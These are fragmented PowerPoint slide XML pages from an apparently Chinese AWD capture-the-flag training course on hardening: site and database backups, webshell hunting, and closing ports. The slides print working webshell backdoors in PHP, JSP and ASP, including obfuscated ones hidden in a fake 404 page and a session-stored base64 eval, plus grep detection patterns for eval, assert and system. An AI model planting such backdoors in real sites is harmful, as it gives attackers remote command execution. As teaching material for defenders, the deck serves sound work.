              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr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线下赛的攻击思路</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000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>
              <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 CN" panose="020B0300000000000000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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="85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flag的脚本的分</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="85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析</a:t>
            </a:r>
            <a:endParaRPr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14932" y="1528013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课程简介</a:t>
            </a:r>
            <a:endParaRPr spc="-5" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6566916" y="1327403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0" y="451103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="449579" y="451103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449579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49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72656" y="1540763"/>
            <a:ext cx="678180" cy="680085"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="678179" h="680085">
                <a:moveTo>
                  <a:pt x="0" y="679703"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="678179" y="679703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678179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61529" y="1557019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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>学习目标</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="020000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94" y="36285"/>
            <a:ext cx="12155605" cy="67854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0990" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468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5654" y="65265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网 站 备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份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970" y="1143000"/>
            <a:ext cx="10323830" cy="51669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备份网站源码！！！</a:t>
            </a:r>
            <a:endParaRPr sz="2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备份网站源码！！！</a:t>
            </a:r>
            <a:endParaRPr sz="2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备份网站源码！！！</a:t>
            </a:r>
            <a:endParaRPr sz="2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重要的事情要三遍</a:t>
            </a:r>
            <a:endParaRPr sz="2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tabLst>
                <a:tab pos="1082040" algn="l"/>
                <a:tab pos="4316095" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="16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tar –cvf	web.tar /var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="16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tabLst>
                <a:tab pos="1082040" algn="l"/>
                <a:tab pos="4316095" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" kern="0"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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zip -r ***.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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web网站打包</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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tabLst>
                <a:tab pos="1082040" algn="l"/>
                <a:tab pos="4316095" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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tar –xvf web.tar </a:t>
            </a:r>
            <a:endParaRPr sz="16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16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unzip web.zip			</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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解包</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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endParaRPr sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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注：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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1</a:t>
            </a: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、防止自己改崩</a:t>
            </a:r>
            <a:endParaRPr sz="2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626745">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2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2</a:t>
            </a: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、防止被对手删除源码</a:t>
            </a:r>
            <a:endParaRPr sz="2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626745">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2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、便于快速恢复网站正常</a:t>
            </a:r>
            <a:endParaRPr sz="24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615543" y="580466"/>
            <a:ext cx="3003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3042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数 据 库 备</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="32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份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675" y="1791335"/>
            <a:ext cx="9201785" cy="359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mysqldump –uusername –ppasswod databasename &gt; bak.sql</a:t>
            </a:r>
            <a:endParaRPr sz="180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备份指定数据库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54965" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="21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mysqldump –all-databases &gt; bak.sql</a:t>
            </a:r>
            <a:endParaRPr sz="180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备份所有数据库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54965" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="21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mysql –uusername –ppasswd database &lt; bak.sql</a:t>
            </a:r>
            <a:endParaRPr sz="180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导入数据库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比赛通常可以在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WEB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站点的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config.php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文件中</a:t>
            </a:r>
            <a:endParaRPr sz="18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009" y="70218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后 门 查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杀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500" y="1271717"/>
            <a:ext cx="8620125" cy="52197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40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b="1" kern="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常规的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" kern="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查杀</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="0">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pP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在这里首先我们要搞清楚什么是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webshell?</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>"web"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的含义就是需要服务器开放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服务，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"shell"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的含 义是取得对服务器某种程度上的操作权限。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webshell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常常被称为匿名用户通过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端口对网站服务器的某种操作权限。</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0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>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pP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通俗讲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webshell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就是具有强大功能的网页，不希望获取的权限，比如执行命令，删除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页面，修改主页等。</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0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>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="18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phpwebshell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220980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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&lt;?php @eval($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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txf</a:t>
            </a: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']); ?&gt;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220980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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&lt;?php @eval($_POST['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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txf</a:t>
            </a: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']); ?&gt;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220980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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&lt;?php @eval($_REQUESTS['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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txf</a:t>
            </a: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']); ?&gt;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jspwebshell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220980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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&lt;%Runtime.getRuntime().exec(request.getParameter("i"));%&gt;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aspwebshell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220980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kern="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&lt;%eval request ("value")%&gt; 或 &lt;% execute(request("value")) %&gt;</a:t>
            </a:r>
            <a:endParaRPr kern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5179" y="598677"/>
            <a:ext cx="1633855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后 门 查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杀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20" y="1161415"/>
            <a:ext cx="9940290" cy="83947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235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b="1" spc="-16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盾</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10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web</a:t>
            </a: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查杀</a:t>
            </a:r>
            <a:endParaRPr sz="18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使用D盾这种web扫描器进行查杀，可以快速直接查杀相应的webshell。</a:t>
            </a:r>
            <a:endParaRPr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8735" y="2029967"/>
            <a:ext cx="6812279" cy="42656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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615543" y="580466"/>
            <a:ext cx="3003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86" y="36285"/>
            <a:ext cx="12155713" cy="67854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986" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468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8664" y="65900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后 门 查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杀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144" y="1497329"/>
            <a:ext cx="6871334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关键字查杀</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-4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(</a:t>
            </a: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查找敏感函数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-4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 panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204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find . -name ‘*.php’ | xargs grep -n ‘eval(‘</a:t>
            </a:r>
            <a:endParaRPr sz="180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90204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="185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find . –name ‘*.php’ | xargs grep –n ‘assert(’</a:t>
            </a:r>
            <a:endParaRPr sz="180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90204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="185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find . –name ‘*.php’ | xargs grep –n ‘system(’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 panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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命令执行函</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="405" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>exec()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75" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>passthru()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95" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>system()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50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1800" spc="-95" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>shell_exec()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65" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>popen()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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等</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>;  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代码执行函数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>eval()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80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>assert()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85" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>preg_repace()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55" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>uasort()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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等；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文件包含函</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="405" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>数</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>include()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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50" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>require()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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等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615543" y="580466"/>
            <a:ext cx="3003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83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009" y="69329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后 门 查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杀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500" y="1561591"/>
            <a:ext cx="8593455" cy="476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b="1" kern="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隐藏后门查杀</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="0">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000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kern="0">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="99000"/>
              </a:lnSpc>
            </a:pP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常规后门非常容易被查杀或者发现，一般使用关键字识别的方式就可以快速定位到后门存在的位 置，快速删除即可。但是许多时候可能会遇到很多变形的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webshell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，一般此类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webshell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不易被通用 脚本或者关键字检测的方式直接检测发现。这边了解一些此类的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webshell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16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</a:pPr>
            <a:endParaRPr sz="16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ts val="2155"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="18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404</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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页面的后门隐藏</a:t>
            </a:r>
            <a:endParaRPr sz="18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ts val="2155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&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;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&lt;html&gt;&lt;head&gt;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&lt;title&gt;404 Not Found&lt;/title&gt;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&lt;/head&gt;&lt;body&gt;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&lt;h1&gt;Not Found&lt;/h1&gt;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&lt;p&gt;The requested URL was not found on this server.&lt;/p&gt;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&lt;/body&gt;&lt;/html&gt;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 marR="3357880">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>&lt;?php  @preg_replace("/[pageerror]/e",$_POST['error'],"saft");  header('HTTP/1.1 404 Not Found');</a:t>
            </a:r>
            <a:endParaRPr sz="18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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern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93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" y="0"/>
            <a:ext cx="12191999" cy="67850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790" y="176021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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6391656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4069" y="667257"/>
            <a:ext cx="1633855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后 门 查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杀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0945" y="1431925"/>
            <a:ext cx="10460355" cy="387985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497205" indent="-457835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1230"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="497205" algn="l"/>
                <a:tab pos="497840" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" kern="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无特征隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1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php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" kern="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后门</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="16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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>session_start();</a:t>
            </a:r>
            <a:endParaRPr sz="16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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>$_POST['code'] &amp;&amp; $_SESSION['theCode'] = trim($_POST['code']);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>$_SESSION['theCode']&amp;&amp;preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a’);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="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</a:pPr>
            <a:endParaRPr sz="1600" kern="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kern="0">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="497205" indent="-457835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497205" algn="l"/>
                <a:tab pos="497840" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" kern="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隐藏的一句话木马</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>&lt;?php $_GET[a]($_GET[b]);?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57785">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="965"/>
              </a:spcBef>
            </a:pP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用法：</a:t>
            </a:r>
            <a:endParaRPr sz="16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kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>传参：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>?a=assert&amp;b=phpinfo();</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern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549910" y="591820"/>
            <a:ext cx="8782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10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6129" y="630555"/>
            <a:ext cx="231648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Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>可疑服务和端口关闭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625" y="1985010"/>
            <a:ext cx="754126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关闭可疑服务和不必要端口</a:t>
            </a:r>
            <a:endParaRPr sz="18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latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>netstat –anp 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查看端口开启情况；</a:t>
            </a:r>
            <a:endParaRPr sz="18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Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="3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latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ps –aux 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查看进程；</a:t>
            </a:r>
            <a:endParaRPr sz="18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Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="32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latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>kill -9 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" kern="0" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>杀死可疑进程</a:t>
            </a:r>
            <a:endParaRPr sz="1800" kern="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40385" y="569595"/>
            <a:ext cx="8286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11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2979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086" y="1138301"/>
            <a:ext cx="848360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通过前期备份的站点源码，进行源代码审计分析。这里可以通过源代码审计工具配合 人工审计的方式最佳。</a:t>
            </a:r>
            <a:endParaRPr sz="18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审计工具</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-135" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-135" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>seay</a:t>
            </a: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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-120" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>cobar-W</a:t>
            </a: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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-145" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>rips</a:t>
            </a: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等</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000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4304" y="2412492"/>
            <a:ext cx="6906768" cy="411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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559435" y="568960"/>
            <a:ext cx="11195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12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46937"/>
            <a:ext cx="8376920" cy="153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9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  <a:p>
            <a:pPr marL="382905" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="735"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="382905" algn="l"/>
                <a:tab pos="383540" algn="l"/>
              </a:tabLst>
            </a:pP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php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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是什么？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0005">
              <a:lnSpc>
                <a:spcPts val="1825"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
            </a:pP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（超文本预处理器的字母缩写）是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一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种被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广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泛应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用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的开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放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源代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码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的多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用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途脚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本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语言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它可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嵌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入</a:t>
            </a:r>
            <a:endParaRPr sz="16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0005">
              <a:lnSpc>
                <a:spcPts val="1825"/>
              </a:lnSpc>
            </a:pP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到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45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HTML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中。</a:t>
            </a:r>
            <a:endParaRPr sz="16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5" y="2334895"/>
            <a:ext cx="9072245" cy="277939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1145"/>
              </a:spcBef>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="382905" algn="l"/>
                <a:tab pos="383540" algn="l"/>
              </a:tabLst>
            </a:pP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php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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能做什么？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0005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="835"/>
              </a:spcBef>
            </a:pP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主要用于编写服务端的脚本、编写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命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令行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</a:rPr>
              <a:t>脚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</a:rPr>
              <a:t>本。</a:t>
            </a:r>
            <a:endParaRPr sz="16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000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PHP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基本语法格式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&lt;?php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80695" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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代码内容语句分号结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尾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30" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>?&gt;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31495" y="571500"/>
            <a:ext cx="5886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233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课程目录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94397" y="2983229"/>
            <a:ext cx="250190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Font typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="328930" algn="l"/>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1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一</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="80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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44F53"/>
                </a:solidFill>
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的概念</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="328930" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc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二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、A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="114" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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攻防之加固 三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、A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="114" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
